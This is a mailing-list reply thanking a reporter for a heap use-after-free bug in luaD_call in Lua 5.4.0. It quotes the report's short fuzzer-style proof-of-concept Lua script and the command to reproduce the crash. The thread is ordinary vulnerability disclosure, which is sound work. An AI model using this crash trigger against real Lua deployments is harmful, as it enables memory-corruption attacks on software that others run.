Re: Heap use after free in luaD_call

[Date Prev][Date Next][Thread Prev][Thread Next] [Date Index] [Thread Index]

• Subject: Re: Heap use after free in luaD_call
• From: Roberto Ierusalimschy <roberto@...>
• Date: Mon, 6 Jul 2020 09:53:15 -0300

---

> We found a heap use after free in lua. Here’s the details:
> 
> Version:
> 
> Lua 5.4.0, git hash c33b1728aeb7dfeec4013562660e07d32697aa6b
> 
> POC:
> 
> function errfunc() string.rep('mod', 512) end
> 
> function test()
> 
>     load(function()(function() printload(
> 
>         xpcall(test, function() print(xpcall(test, errfunc)) end)) end)()
> end)
> 
> end(function() print(xpcall(test, errfunc)) end)()
> 
>  
> 
> How to reproduce:
> 
> ./lua poc.lua
Thanks for the report.
-- Roberto

---

• References:
  • Heap use after free in luaD_call, Yongheng Chen

• Prev by Date: Re: Stack overflow in luaO_pushvfstring
• Next by Date: RE: Stack overflow in luaO_pushvfstring
• Previous by thread: Heap use after free in luaD_call
• Next by thread: Heap use after free in luaD_call
• Index(es):
  • Date
  • Thread